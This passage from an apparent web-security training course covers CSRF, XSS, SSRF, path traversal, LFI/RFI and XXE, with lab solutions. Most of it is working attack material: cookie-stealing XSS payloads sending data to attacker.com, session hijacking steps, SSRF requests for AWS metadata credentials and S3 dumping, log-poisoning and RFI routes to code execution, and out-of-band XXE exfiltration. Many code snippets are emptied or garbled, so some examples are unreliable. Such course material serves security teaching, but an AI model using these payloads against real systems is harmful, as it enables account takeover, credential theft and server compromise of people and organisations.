\n\ndocument.forms[0].submit();\n\n\n```\n\n**Key differences:**\n1. XSS executes JavaScript in the victim's context; CSRF only makes the browser send HTTP requests\n2. XSS can read data from the page and exfiltrate it; CSRF cannot read responses (due to Same-Origin Policy)\n3. XSS bypasses CSRF protections because the request appears to come from the legitimate site\n4. CSRF requires the victim to have an active session; XSS works with or without sessions\n\n**Combined attack:**\n```html\n\n\n // Read the anti-CSRF token from the page\n var token = document.getElementById('csrf-token').value;\n \n // Send CSRF request with the token\n fetch('/api/change-email', {\n method: 'POST',\n headers: {'Content-Type': 'application/x-www-form-urlencoded'},\n body: 'csrf=' + token + '&email=attacker@evil.com'\n });\n\n```\n\n### Anti-CSRF Tokens: How They Work\n\nAnti-CSRF tokens are the primary defense against CSRF attacks. They work by adding a secret value to forms and verifying it on the server side.\n\n**Token generation and verification flow:**\n```\n1. Server generates unique token for session\n token = generateSecureRandomToken()\n store token in session\n embed token in form as hidden field\n\n2. User receives form with token\n \n\n \n \n Update\n \n\n3. User submits form with token\n POST /update-email\n csrf_token=abc123xyz&email=new@example.com\n\n4. Server verifies token\n if (submitted_token == session_token) {\n // Process request\n } else {\n // Reject request\n }\n```\n\n**Token requirements:**\n- Unique per session (not per request)\n- Cryptographically random\n- Not guessable\n- Validated on every state-changing request\n- Tied to the user's session\n\n**Implementation example (Python/Flask):**\n```python\nimport secrets\nfrom flask import session, abort\n\n@app.route('/form')\ndef form():\n # Generate token for session\n if 'csrf_token' not in session:\n session['csrf_token'] = secrets.token_hex(32)\n return render_template('form.html', token=session['csrf_token'])\n\n@app.route('/submit', methods=['POST'])\ndef submit():\n # Verify token\n token = request.form.get('csrf_token')\n if token != session.get('csrf_token'):\n abort(403) # Invalid token\n \n # Process request\n return \"Success\"\n```\n\n**Token embedding in HTML:**\n```html\n\n\n \n \n\n```\n\n### Bypassing Anti-CSRF Tokens\n\nWhile anti-CSRF tokens are effective when properly implemented, several bypass techniques exist.\n\n**Token leakage via XSS:**\n```html\n\n // XSS can read the token from the page\n var token = document.querySelector('input[name=\"csrf_token\"]').value;\n fetch('https://attacker.com/steal?token=' + token);\n\n```\n\nIf XSS exists, CSRF protections can be bypassed because the malicious script can read the token.\n\n**Token prediction:**\nIf tokens are not sufficiently random or have patterns, attackers might predict them.\n```python\n# Vulnerable: Predictable tokens\ntoken = str(session['user_id']) + '-' + str(timestamp)\n# Attacker can generate valid tokens for other users\n```\n\n**Token not validated on all endpoints:**\n```python\n# Vulnerable: Some endpoints don't validate\n@app.route('/api/delete-account', methods=['POST'])\ndef delete_account():\n # Missing token validation!\n user.delete()\n return \"Deleted\"\n```\n\n**CSRF token not checked for GET requests:**\n```python\n# Vulnerable: GET requests change state\n@app.route('/api/transfer')\ndef transfer():\n # CSRF token only checked on POST, but this is GET\n amount = request.args.get('amount')\n account = request.args.get('to')\n # Process transfer - no token check!\n```\n\n**CORS misconfiguration:**\n```python\n# Vulnerable: CORS allows cross-origin requests\n@app.route('/api/transfer', methods=['POST'])\ndef transfer():\n # Any origin can make requests\n response.headers['Access-Control-Allow-Origin'] = '*'\n # Process transfer\n```\n\n**Double Submit technique bypass:**\nSome applications use double-submit patterns where the token is sent both as a cookie and as a request parameter. If the application doesn't validate the cookie value, an attacker can set the cookie via JavaScript.\n\n### GET vs POST CSRF: URL-Based vs Form-Based\n\nCSRF attacks can be delivered through HTTP GET or POST requests, depending on how the target application processes requests.\n\n**GET CSRF:**\nIf a application uses GET requests for state-changing operations, the attack is trivially simple.\n\n```html\n\n\n\n\n\n\n\nClick here\n```\n\n**Proper implementation (GET should not modify state):**\n```python\n# Correct: GET only retrieves data\n@app.route('/api/account/balance', methods=['GET'])\ndef get_balance():\n return {'balance': current_user.balance}\n\n# Wrong: GET modifies state\n@app.route('/api/transfer', methods=['GET'])\ndef transfer():\n # Never do this!\n process_transfer(request.args.get('to'), request.args.get('amount'))\n```\n\n**POST CSRF via form:**\n```html\n\n\n\n\n \n \n\ndocument.getElementById('csrf').submit();\n\n\n```\n\n**POST CSRF via fetch:**\n```html\n\nfetch('https://target.com/api/transfer', {\n method: 'POST',\n credentials: 'include',\n headers: {'Content-Type': 'application/x-www-form-urlencoded'},\n body: 'to=attacker&amount=10000'\n});\n\n```\n\n**Multi-part form CSRF:**\n```html\n\n\n \n\ndocument.forms[0].submit();\n```\n\n### JSON CSRF and Cross-Origin Resource Sharing\n\nModern web applications often use JSON for API requests, which changes the CSRF attack surface.\n\n**Traditional CSRF defense bypass:**\n```html\n\n\n\n \n\n```\n\nThe content-type is not application/json, so traditional CSRF may not work.\n\n**JSON CSRF via XHR:**\n```html\n\nvar xhr = new XMLHttpRequest();\nxhr.open('POST', 'https://api.target.com/user', true);\nxhr.setRequestHeader('Content-Type', 'application/json');\nxhr.withCredentials = true;\nxhr.send('{\"email\": \"attacker@evil.com\"}');\n\n```\n\n**CORS-based JSON CSRF:**\nIf the target API has permissive CORS configuration:\n```html\n\nfetch('https://api.target.com/user', {\n method: 'POST',\n mode: 'no-cors', // Bypasses CORS checks\n credentials: 'include',\n headers: {'Content-Type': 'application/json'},\n body: '{\"email\": \"attacker@evil.com\"}'\n});\n\n```\n\n**JSON CSRF via form with JSON content-type:**\nSome applications accept JSON via traditional form submissions:\n```html\n\n\n \n\n```\n\nThe server must be configured to accept form-encoded data and parse it as JSON.\n\n**CORS misconfiguration exploitation:**\n```python\n# Vulnerable CORS configuration\n@app.route('/api/transfer', methods=['POST'])\ndef transfer():\n response.headers['Access-Control-Allow-Origin'] = '*'\n response.headers['Access-Control-Allow-Credentials'] = 'true'\n # Process request\n```\n\nAn attacker can make requests from their domain if the API allows credentials with wildcard origin.\n\n### Real Example: Bank Transfer CSRF\n\nLet's examine a realistic CSRF attack against a banking application.\n\n**Vulnerable banking application:**\n```python\n# Vulnerable Flask application\nfrom flask import Flask, session, request, redirect\n\napp = Flask(__name__)\napp.secret_key = 'secret'\n\n@app.route('/login')\ndef login():\n # Simple authentication\n session['user'] = request.form.get('username')\n return 'Logged in as ' + session['user']\n\n@app.route('/transfer')\ndef transfer():\n # Vulnerable: No CSRF protection\n to_user = request.form.get('to')\n amount = request.form.get('amount')\n \n # Process transfer\n return f'Transferred {amount} to {to_user}'\n\n@app.route('/')\ndef index():\n if 'user' in session:\n return f'Welcome {session[\"user\"]}'\n return 'Please login'\n```\n\n**Attack page:**\n```html\n\n\n\n You Won a Prize!\n\n\n\nCongratulations! You have won a $500 Amazon gift card.\n\nClick below to claim:\n\n\n \n \n\n\n // Auto-submit when page loads\n document.getElementById('attack').submit();\n\n\n\n```\n\n**Attack flow:**\n1. Attacker creates malicious page\n2. Victim is logged into bank.com\n3. Victim visits attacker's page\n4. Form auto-submits to bank.com/transfer\n5. Browser includes bank.com session cookie\n6. Bank processes transfer as legitimate\n\n**Real-world considerations:**\n- User must be logged into the target site\n- User must visit the malicious page\n- Transfer may require confirmation\n- Bank may have additional verification\n- Attack is more convincing with proper social engineering\n\n**Proper CSRF protection:**\n```python\nimport secrets\n\n@app.route('/transfer-page')\ndef transfer_page():\n # Generate CSRF token\n if 'csrf_token' not in session:\n session['csrf_token'] = secrets.token_hex(32)\n return f'''\n \n\n \n To: \n Amount: \n Transfer\n \n '''\n\n@app.route('/transfer', methods=['POST'])\ndef transfer():\n # Verify CSRF token\n token = request.form.get('csrf_token')\n if token != session.get('csrf_token'):\n return 'CSRF token invalid', 403\n \n # Process transfer\n return 'Transfer successful'\n```\n\n---\n\n## Exercise 5: Find and Exploit Reflected XSS\n\n### Objective\n\nFind and exploit a reflected XSS vulnerability in the PortSwigger Academy \"Reflected XSS where nothing is reflected\" lab or DVWA (Damn Vulnerable Web Application).\n\n### Environment Setup\n\nFor this exercise, you will need:\n- Burp Suite Community or Professional\n- A browser configured to use Burp proxy\n- Access to PortSwigger Academy (free tier available) or DVWA installed locally\n\n### Instructions\n\n**Part 1: Identify the Reflection Point**\n\n1. Navigate to the target lab: https://ac...id.web-security-academy.net\n2. Enter a unique test string (e.g., `XSS_TEST_12345`)\n3. Submit the search/request\n4. In Burp Proxy, examine the response\n5. Find where your test string appears in the HTML\n\n**Part 2: Analyze the Context**\n\n1. Note the exact HTML context where your string appears\n2. Determine if it's in a tag, attribute, text content, or JavaScript\n3. Check if angle brackets are encoded\n4. Identify the exploitation approach\n\n**Part 3: Craft and Test Payload**\n\n1. Based on context, craft an appropriate XSS payload\n2. For body context: `alert(document.domain)`\n3. For attribute context: try breaking out with quotes\n4. For JavaScript context: escape the string and inject\n\n**Part 4: Verify Execution**\n\n1. Confirm the alert dialog appears\n2. Verify the domain is displayed correctly\n3. Document the exact URL and payload used\n\n**Deliverables:**\n- Screenshot of the alert dialog\n- The full exploit URL\n- The context analysis explaining why the payload works\n\n\n\nSolution\n\n**Lab URL:** https://ac...id.web-security-academy.net\n\n**Step 1: Testing for reflection**\n\nNavigate to the lab and enter a test string like `XSS_TEST_`:\n\nRequest: `GET /?search=XSS_TEST_ HTTP/1.1`\nResponse contains: `XSS_TEST_`\n\n**Step 2: Context analysis**\n\nThe test string appears inside a `` tag as text content:\n```html\nXSS_TEST_\n```\n\nWe can break out of the span and inject a script tag:\n```html\nalert(document.domain)\n```\n\n**Step 3: Exploit URL**\n\nFull URL: `https://ac...id.web-security-academy.net/?search=%3C%2Fspan%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E`\n\nDecoded: `https://ac...id.web-security-academy.net/?search=alert(document.domain)`\n\n**Step 4: Verification**\n\nWhen the victim clicks this link:\n1. Browser requests the URL\n2. Server reflects our payload in the response\n3. HTML becomes: `alert(document.domain)`\n4. Browser parses HTML, sees script tag\n5. Executes alert(document.domain)\n6. Lab is solved\n\n**Alternative payloads:**\n\nIf you need shorter URLs, use event handlers:\n```\nhttps://ac...id.web-security-academy.net/?search=\">\n```\n\nThis creates: ``\n\nThe svg onload executes JavaScript when the element loads.\n\n\n\n---\n\n## Exercise 6: Exploit Stored XSS to Steal Session Cookies\n\n### Objective\n\nExploit a stored XSS vulnerability to steal victim users' session cookies. This exercise demonstrates the real-world impact of stored XSS.\n\n### Environment Setup\n\nFor this exercise, you will need:\n- Two browser profiles (one for attacker, one for victim)\n- Burp Suite for intercepting and inspecting requests\n- Access to PortSwigger Academy stored XSS lab or DVWA\n- A simple web server to receive stolen cookies (can use Burp Collaborator or a simple PHP script)\n\n### Instructions\n\n**Part 1: Set Up Cookie Capture Server**\n\n1. Create a simple PHP script (steal.php) on a server you control:\n```php\n\n```\n\n2. Alternatively, use Burp Collaborator for testing\n\n**Part 2: Identify Stored XSS Vector**\n\n1. Navigate to the target application\n2. Find functionality that stores and displays content (comments, posts, profile)\n3. Test with basic payload: `alert(1)`\n4. Verify the payload executes when viewing stored content\n\n**Part 3: Craft Cookie Theft Payload**\n\n1. Create payload that reads document.cookie\n2. Sends cookie to your server\n3. Payload: `document.location='https://yourserver.com/steal.php?cookie='+document.cookie`\n\n**Part 4: Deliver the Attack**\n\n1. Submit the malicious payload through the stored XSS vector\n2. Wait for victims to view the content\n3. Check your server for received cookies\n\n**Part 5: Session Hijacking**\n\n1. Use stolen cookie to impersonate victim\n2. In Burp Proxy, add the cookie to your request\n3. Access the victim's account\n\n**Deliverables:**\n- Screenshot of stolen cookies received\n- The malicious payload used\n- Screenshot of session hijacking (accessing victim account)\n\n\n\nSolution\n\n**Setup: Cookie Capture Server**\n\nCreate a file called `steal.php`:\n```php\n\n```\n\nHost this on your server at `https://attacker.com/steal.php`\n\n**Lab: Stored XSS in Comments**\n\nTarget: PortSwigger Academy stored XSS lab\n\n**Step 1: Identify the vector**\n\nNavigate to a blog post with comment section:\n```html\n\n\n \n Submit\n\n```\n\n**Step 2: Test basic XSS**\n\nSubmit: `alert(1)`\n\nView the blog post - alert executes.\n\n**Step 3: Craft cookie theft payload**\n\nSubmit this as a comment:\n```html\n\n document.location='https://attacker.com/steal.php?cookie='+encodeURIComponent(document.cookie);\n\n```\n\nURL-encoded version:\n```\n%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fattacker.com%2Fsteal.php%3Fcookie%3D%27%2BencodeURIComponent%28document.cookie%29%3B%3C%2Fscript%3E\n```\n\n**Step 4: Wait for victims**\n\nEvery user who views the blog post will have their cookie sent to your server.\n\n**Step 5: Log file contents**\n\nWhen victims view the page, your cookies.txt will contain entries like:\n```\n[2024-01-15 10:30:45] 192.168.1.100: session=abc123xyz; user=alice\n[2024-01-15 10:31:22] 192.168.1.101: session=def456uvw; user=bob\n```\n\n**Step 6: Session hijacking**\n\nIn Burp Suite, use the Cookie Editor extension or manually set the Cookie header:\n\nRequest:\n```\nGET /account HTTP/1.1\nHost: target.com\nCookie: session=abc123xyz\n```\n\nYou are now authenticated as the victim user.\n\n**Why this works:**\n\n1. The comment is stored in the database\n2. When any user views the blog post, the server retrieves the comment\n3. The comment (containing our script) is included in the page HTML\n4. The user's browser parses the HTML, sees the script tag\n5. The script executes, sending the cookie to attacker.com\n6. The attacker uses the cookie to hijack the session\n\n**Mitigation (for reference):**\n\nThe application should sanitize HTML before storage:\n```php\n// Using HTML Purifier library\nrequire_once 'HTMLPurifier.auto.php';\n$config = HTMLPurifier_Config::createDefault();\n$purifier = new HTMLPurifier($config);\n$clean_comment = $purifier->purify($dirty_comment);\n```\n\n\n\n---\n\n## Summary Table\n\n| Vulnerability | Type | Delivery Method | Server Storage | Detection | Impact |\n|---------------|------|-----------------|----------------|-----------|--------|\n| Reflected XSS | Client-side | URL parameter | No | Reflected in response | Cookie theft, defacement, keylogging |\n| Stored XSS | Server-side | Form submission | Yes (database) | View stored content | Mass cookie theft, persistent malware |\n| DOM-based XSS | Client-side | URL fragment/hash | No | JavaScript analysis | Cookie theft, page manipulation |\n| CSRF | Client-side | Malicious page | No | Request analysis | Unauthorized actions, account takeover |\n\n### XSS Detection Payloads Quick Reference\n\n| Context | Payload | Notes |\n|---------|---------|-------|\n| HTML body | `alert(1)` | Standard script injection |\n| Inside tag | `alert(1)` | Close tag first |\n| Attribute | `\" onload=\"alert(1)` | Break out of attribute |\n| Event handler | `` | Trigger on error |\n| JavaScript | `';alert(1);//` | Escape string context |\n| SVG | `` | SVG element with onload |\n| Encoded | `%3Cscript%3Ealert(1)%3C/script%3E` | URL encode bypass |\n\n### CSRF Prevention Methods\n\n| Method | Implementation | Bypass via XSS? |\n|--------|---------------|------------------|\n| Anti-CSRF token | Server-generated random token | Yes, if XSS exists |\n| SameSite cookies | Cookie attribute | No (but can combine with XSS) |\n| Double-submit | Token in cookie AND parameter | Sometimes |\n| Custom header | Verify X-Requested-With | No (CORS blocks) |\n| Referer check | Verify HTTP Referer | No (can be spoofed partially) |\n\n### Key Differences: XSS vs CSRF\n\n| Aspect | XSS | CSRF |\n|--------|-----|------|\n| Executes code | Yes (JavaScript) | No (just triggers requests) |\n| Can read page content | Yes | No (SOP blocks response reading) |\n| Requires active session | No | Yes |\n| Primary defense | Output encoding, input validation | Anti-CSRF tokens |\n| Attacker's goal | Execute code in victim's browser | Force victim to send requests |\n\n---\n\n## Next Module Preview: SSRF, Path Traversal, LFI/RFI\n\nIn Module 4, we will explore server-side vulnerabilities that target the server's processing of user input.\n\n**Server-Side Request Forgery (SSRF):** Exploiting applications that make HTTP requests based on user input. We'll cover:\n- SSRF fundamentals and impact\n- Port scanning via SSRF\n- Bypassing blacklist filters\n- Cloud metadata service exploitation\n- Lab: Exploiting SSRF in AWS EC2\n\n**Path Traversal:** Manipulating file paths to access files outside the intended directory. We'll cover:\n- Directory traversal fundamentals\n- Null byte injection bypasses\n- Unicode normalization attacks\n- Double encoding bypasses\n- Lab: Reading sensitive system files\n\n**Local File Inclusion (LFI) and Remote File Inclusion (RFI):** Including files in the application's execution context. We'll cover:\n- LFI vs RFI distinction\n- Log poisoning for RCE\n- PHP wrapper exploitation\n- Python/JAVA include vulnerabilities\n- Lab: LFI to RCE via log poisoning\n\nThese vulnerabilities represent critical attack vectors that can lead to complete server compromise, and understanding them is essential for comprehensive web application security testing.\n\n---\n\n## Additional Resources\n\n**Learning Platforms:**\n- PortSwigger Academy (portswigger.net/web-security)\n- OWASP WebGoat\n- DVWA (Damn Vulnerable Web Application)\n- HackTheBox\n\n**Tools:**\n- Burp Suite Professional\n- OWASP ZAP\n- XSStrike (XSS detection)\n- Amass (subdomain enumeration)\n\n**Reference Materials:**\n- OWASP XSS Prevention Cheat Sheet\n- PortSwigger XSS Research\n- Mozilla Developer Network (MDN) JavaScript documentation\n- HTML5 Security Cheat Sheet\n\n---\n\n*Module 3 completed. Continue to Module 4: SSRF, Path Traversal, and File Inclusion vulnerabilities.*\n\n\n# Module 4: SSRF, Path Traversal, LFI/RFI, XXE\n\n## Lesson 16: Server-Side Request Forgery (SSRF)\n\n### What is SSRF?\n\nServer-Side Request Forgery occurs when a web application fetches user-supplied URLs without proper validation. The server acts as a proxy \u2014 requests originate from the server's network position, not the attacker's.\n\n**Why it matters:**\n- Can reach internal services unreachable from the internet\n- AWS metadata at `169.254.169.254`\n- Internal databases, Redis, Memcached\n- Port scanning internal network from the server's perspective\n- Reading local files via `file://` protocol\n\n### Classic SSRF Scenarios\n\n**1. Image URL preview:**\n```php\n// Vulnerable code\n$image_url = $_GET['url'];\n$image = file_get_contents($image_url);\n// OR\n$image = new Imagick($image_url);\n```\n\n**2. Webhook functionality:**\n```python\n# Vulnerable code\nimport requests\nwebhook_url = request.form['webhook']\nrequests.get(webhook_url) # Server fetches attacker's URL\n```\n\n**3. PDF generation:**\n```java\n// Vulnerable code\nString url = request.getParameter(\"url\");\nPdfGenerator.generateFromUrl(url); // Server fetches and renders\n```\n\n**4. URL shortening redirect:**\n```php\n// Vulnerable code\n$redirect_url = $_GET['url'];\nheader(\"Location: $redirect_url\");\n```\n\n### Finding SSRF\n\n**Common parameter names:**\n```\nurl, uri, src, source, sourceURL, srcURL, dest, destination, redirect, path, port, callback, next, data, xml, val, validate, domain, feed, host, url, user, name, connect, q, out, search, target, to, uri, validate\n```\n\n**Test payloads:**\n```\nhttp://localhost/\nhttp://127.0.0.1/\nhttp://[::1]/\nhttp://localhost:22/\nhttp://localhost:6379/\nhttp://169.254.169.254/\nhttp://169.254.169.254/latest/meta-data/\nfile:///etc/passwd\ndict://localhost:11211/stats\nsftp://localhost:22/\nldap://localhost:389/\ngopher://localhost:6379/_INFO\n```\n\n### Filter Bypass Techniques\n\n**Localhost bypass:**\n```\nlocalhost\n127.0.0.1\n127.1\n[::1]\n0x7f000001\n2130706433\n127.0.0.1.xip.io\nlocaldomain\n```\n\n**DNS resolution tricks:**\n```\n127.0.0.1.nip.io\n127.0.0.1.sslip.io\nlocalhost.attacker.com \u2192 A record points to 127.0.0.1\n```\n\n**URL parsing bypass:**\n```\nhttp://localhost:80@127.0.0.1/\nhttp://127.0.0.1:80@localhost/\nhttp://127.0.0.1#localhost/\nhttp://127.0.0.1?localhost/\n```\n\n**IPv6:**\n```\n[0:0:0:0:0:0:0:1]\n[::1]\n```\n\n**Encoding:**\n```\nhttp://%31%32%37%2e%30%2e%30%2e%31/\nhttp://2130706433/\nhttp://0x7f000001/\n```\n\n### PortSwigger Lab: SSRF against In-House API\n\n**Lab description:** Product stock checker fetches data from an internal API at `http://localhost:8080`. Goal: access the admin panel at `http://localhost:8080/admin`.\n\n**Step 1: Find the SSRF endpoint**\nStock check feature at `/product/stock` \u2014 POST parameter `stockApi`:\n```\nPOST /product/stock\nstockApi=http://localhost:8080/admin/delete?productId=1\n```\n\n**Step 2: Test basic SSRF**\n```\nPOST /product/stock\nstockApi=http://localhost:8080/admin\n\u2192 Response: \"Invalid product ID\" (admin panel exists but needs different access)\n```\n\n**Step 3: Enumerate admin endpoints**\n```\nPOST /product/stock\nstockApi=http://localhost:8080/admin/\n\u2192 401 Unauthorized (requires auth)\n\nPOST /product/stock\nstockApi=http://localhost:8080/admin/delete?productId=1\n\u2192 200 OK with \"Product deleted\" or similar\n```\n\n**Step 4: Extract admin credentials**\n```\nPOST /product/stock\nstockApi=http://localhost:8080/admin/users\n\u2192 Lists user IDs and password hashes\n\nPOST /product/stock\nstockApi=http://localhost:8080/api/v1/users\n\u2192 Alternative API endpoint\n```\n\n### SSRF to AWS Metadata\n\n```bash\n# Latest instance metadata\nhttp://169.254.169.254/latest/meta-data/\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/\nhttp://169.254.169.254/latest/meta-data/instance-id\nhttp://169.254.169.254/latest/meta-data/ami-id\nhttp://169.254.169.254/latest/meta-data/public-ipv4\n\n# AWS keys (if IAM role attached)\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/AwsInstanceRole\n\u2192 Returns: AccessKeyId, SecretAccessKey, Token\n```\n\n**Exploitation:**\n```bash\n# Use AWS keys to:\naws s3 ls # List S3 buckets\naws ec2 describe-instances # List EC2 instances\naws --region us-east-1 s3 sync s3://victim-bucket/ /tmp/dump/\n```\n\n### Blind SSRF\n\nWhen the response isn't returned, use out-of-band techniques:\n\n**DNS exfiltration:**\n```\nhttp://attacker.com/$(whoami).dns\nhttp://attacker.com/?x=$(cat /etc/passwd)\n```\n\n**Collaborator Everywhere (Burp extension):**\n- Automatically inserts Collaborator payloads into all requests\n- Any out-of-band interaction gets flagged\n\n**Detection via time delays:**\n```\nhttp://169.254.169.254/latest/meta-data/ # If slow response \u2192 SSRF confirmed\n```\n\n---\n\n## Lesson 17: Path Traversal\n\n### What is Path Traversal?\n\nPath traversal (also called directory traversal) allows attackers to escape the intended directory and access files outside the web root. It occurs when user input is used in file paths without proper sanitization.\n\n**Vulnerable code:**\n```php\ninclude($_GET['page']); // ?page=../../etc/passwd\n```\n\n```python\nwith open(f\"/var/www/uploads/{filename}\") as f:\n content = f.read()\n```\n\n### Detection Payloads\n\n**Unix:**\n```\n../../etc/passwd\n../../../etc/passwd\n../../../../etc/passwd\n../../../../../etc/passwd\n....//....//....//etc/passwd\n..%252f..%252f..%252fetc/passwd\n..%c0%af..%c0%af..%c0%afetc/passwd\n```\n\n**Windows:**\n```\n..\\..\\..\\windows\\system32\\config\\sam\n..%255c..%255c..%255cwindows\\system32\\config\\sam\n..%c0%af..%c0%af..%c0%afwindows\\system32\\config\\sam\n```\n\n**Double encoding:** The `%252f` becomes `/` after double decoding.\n\n**UTF-8 encoding:** `%c0%af` is an overlong UTF-8 encoding of `/`.\n\n### Null Byte Injection\n\n```\n../../etc/passwd%00.jpg\n```\n\nThe null byte (`%00`) truncates the string at that point, effectively removing `.jpg` extension. Works in older PHP versions.\n\n### Testing in Burp Intruder\n\n1. Find a file path parameter\n2. Send to Intruder\n3. Use pitchfork with wordlist and target parameter\n4. Fuzz with path traversal payloads\n5. Look for `/etc/passwd` content in response (root:x:0:0:...)\n\n**Wordlist for fuzzing:**\n```bash\n# /usr/share/wordlists/dirb/special_characters.txt\n# /usr/share/wordlists/wfuzz/Injection\u6280\n```\n\n### Path Truncation Bypass\n\nPHP historically truncated paths at 4096 bytes:\n```\n../../../../[truncated to 4096]../../../etc/passwd\n```\n\nModern PHP 5.3.4+ fixed this.\n\n### Real-World Example: Apache Struts CVE-2014-0050\n\n```\nGET /struts2-rest-showcase/orders/3;boundary=xxxxx HTTP/1.1\nContent-Type: multipart/form-data; boundary=xxxxx\nContent-Length: 999999\n\n--xxxxx\nContent-Disposition: form-data; name=\"upl\"; filename=\"xx\"\nContent-Type: text/plain\n\n../../../../../../../../../../etc/passwd\n--xxxxx--\n```\n\n---\n\n## Lesson 18: Local File Inclusion (LFI)\n\n### What is LFI?\n\nLFI occurs when a PHP (or similar) application includes a file based on user input without proper sanitization. Unlike RFI, the file is local to the server.\n\n**Vulnerable code:**\n```php\n\n```\n\n```jsp\n\n```\n\n### PHP Wrappers \u2014 The Exploitation Toolkit\n\n**1. php://filter (read source code without execution):**\n```\n?page=php://filter/convert.base64-encode/resource=index.php\n```\nReturns base64-encoded source of `index.php`. Decode to read source.\n\n```\n?page=php://filter/string.toupper/resource=index.php\n```\n\n**2. php://input (RCE if allow_url_include is on):**\n```\nPOST ?page=php://input\n\n```\n\n**3. expect:// wrapper (RCE if PHP expect extension enabled):**\n```\n?page=expect://whoami\n```\nDirect command execution \u2014 rare but devastating.\n\n**4. file:// wrapper (read any accessible file):**\n```\n?page=file:///etc/passwd\n```\n\n**5. zip:// wrapper (execute uploaded PHP zip):**\n```\n?page=zip://archive.zip#shell.php\n```\n\n### LFI to RCE: Log Poisoning\n\n**Technique:** Inject PHP code into server logs, then include the log file.\n\n**Step 1: Find log location**\n```\n/var/log/apache2/access.log\n/var/log/nginx/access.log\n/var/log/httpd/access_log\n/proc/self/fd/0\n/proc/self/fd/1\n/proc/self/fd/2\n```\n\n**Step 2: Inject payload via User-Agent**\n```bash\ncurl -A \"\" http://target.com/\n```\n\n**Step 3: Include the log**\n```\nGET /?page=/var/log/apache2/access.log&cmd=whoami\n```\n\n**Step 4: RCE**\n```\nGET /?page=/var/log/apache2/access.log&cmd=id\n```\n\n### LFI to RCE: Session Poisoning\n\n**Technique:** Write PHP code to session file, then include session file.\n\n**Step 1: Find session file location**\n```php\nsession.save_path = /var/lib/php/sessions/\nsession.save_path = /tmp\n```\n\n**Step 2: Determine session filename**\n```php\n// PHP default: PHPSESSID value \u2192 sess_PHPSESSID\nsess_abc123def456\n```\n\n**Step 3: Write payload to session via PHP code in page parameter**\n```\nGET /?page=\n```\nBut wait \u2014 you need to write via the application's own parameters, not the file parameter.\n\nActually: Many apps store user-controlled data in sessions (like username):\n```php\n$_SESSION['username'] = $_POST['username'];\n```\nRegister with username containing PHP code, then include session file.\n\n**Step 4: Poll session file and include**\n```\nGET /?page=/var/lib/php/sessions/sess_abc123def456&cmd=whoami\n```\n\n### Filter Bypass for LFI\n\n**Null byte:**\n```\n?page=../../etc/passwd%00\n```\n\n**Path double encoding:**\n```\n?page=..%252f..%252f..%252fetc%252fpasswd\n```\n\n**Path truncation:**\n```\n?page=../../../../../../../../../../../etc/passwd\n```\n(Long chain of `../` sometimes bypasses filters that strip `../`)\n\n**fopen wrapper:**\n```\n?page=safe://../../etc/passwd\n```\n\n**Real path truncation (old PHP):**\n```\n?page=../../etc/passwd.[NULL BYTE WAS HERE]\n```\n\n---\n\n## Lesson 19: Remote File Inclusion (RFI)\n\n### What is RFI?\n\nRFI occurs when a web application includes a remote file from a URL provided by the user. This almost always leads to Remote Code Execution.\n\n**Vulnerable code:**\n```php\n\n```\n\n**Requirements:**\n- `allow_url_fopen = On` (PHP default)\n- `allow_url_include = On` (PHP default was On before 5.2)\n\n### RFI Exploitation\n\n**Step 1: Host malicious PHP on attacker server**\n```php\n\n```\n\n**Step 2: Include it**\n```\nGET /?style=http://attacker.com/malicious.php&cmd=whoami\n```\n\n**Step 3: RCE confirmed**\n```\nGET /?style=http://attacker.com/malicious.php&cmd=id\n```\n\n### RFI with Data URI (PHP 5.2+)**\n\n```php\n\n```\n\n```\nGET /?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=\n```\nBase64 decodes to: ``\n\n### RFI Limitations\n\n1. Network connectivity from server required\n2. `allow_url_include` must be On (off by default in PHP 5.2+)\n3. Some networks block outbound HTTP\n4. PHP stream wrappers may not handle complex payloads\n\n---\n\n## Lesson 20: XML External Entity (XXE)\n\n### What is XXE?\n\nXXE exploits XML parsers that process external entities. An attacker can:\n- Read local files\n- Perform SSRF\n- Execute commands (in files supported)\n- Denial of Service (billion laughs attack)\n\n**Vulnerable code:**\n```php\n\n```\n\n```java\nDocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\ndbf.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);\n```\n\n### Basic XXE: Read Local Files\n\n```xml\n\n\n]>\n&xxe;\n```\n\n**Parsing this XML returns /etc/passwd content.**\n\n### XXE with Parameter Entities\n\n```xml\n\n\n \">\n %trick;\n]>\n&send;\n```\n\nParameter entities (`%xxe`) can be defined and used within DTD.\n\n### Blind XXE (Out-of-Band)\n\nWhen the parser doesn't return data in the response:\n\n**Step 1: Attacker-controlled DTD on their server**\n```xml\n\n\">\n```\n\n**Step 2: Reference it from vulnerable XML**\n```xml\n\n\n %remote;\n]>\n&send;\n```\n\n**Step 3: Attacker receives /etc/passwd in their server logs**\n\n### Billion Laughs (DoS Attack)\n\n```xml\n\n\n \n \n]>\n&lol3;\n```\n\nExpands exponentially: 10 \u00d7 10 \u00d7 10 = 1000 entities, each referencing 10 of previous.\n\n### XXE to RCE (expect:// Wrapper)\n\nIf the `expect` PHP extension is enabled:\n```xml\n\n\n]>\n&xxe;\n```\n\n### PortSwigger Lab: XXE to Read Local Files\n\n**Lab:** Product catalog parses XML. Goal: read `/etc/hostname`.\n\n**Step 1: Find XML input**\nPOST to `/product/stock` with XML body:\n```xml\n\n\n 1\n 1\n\n```\n\n**Step 2: Inject XXE to read file**\n```xml\n\n\n]>\n\n &xxe;\n 1\n\n```\n\n**Step 3: Response contains hostname**\n```xml\n\n stock-manager\n 1\n\n```\n\n---\n\n## Exercise 7: SSRF to AWS Metadata Extraction\n\n**Objective:** Exploit SSRF in an image URL preview feature to extract AWS credentials.\n\n**Lab:** PortSwigger \"SSRF with whitelist-based input filter\"\n\n**Steps:**\n1. Identify the SSRF endpoint: `stockApi` parameter in `/product/stock`\n2. The parameter has a whitelist filter \u2014 only allows `localhost` and `stock.weliketoshop.net`\n3. Bypass: Use `localhost@stock.weliketoshop.net` or similar trick\n4. Actually, the lab solution uses `stock.weliketoshop.net@127.0.0.1`\n5. Extract credentials:\n\n```bash\n# In Burp Repeater:\nPOST /product/stock HTTP/1.1\nstockApi=http://169.254.169.254/latest/meta-data/iam/security-credentials/\n```\n\n6. The response contains AWS access key and secret\n7. Use AWS CLI with those credentials to list S3 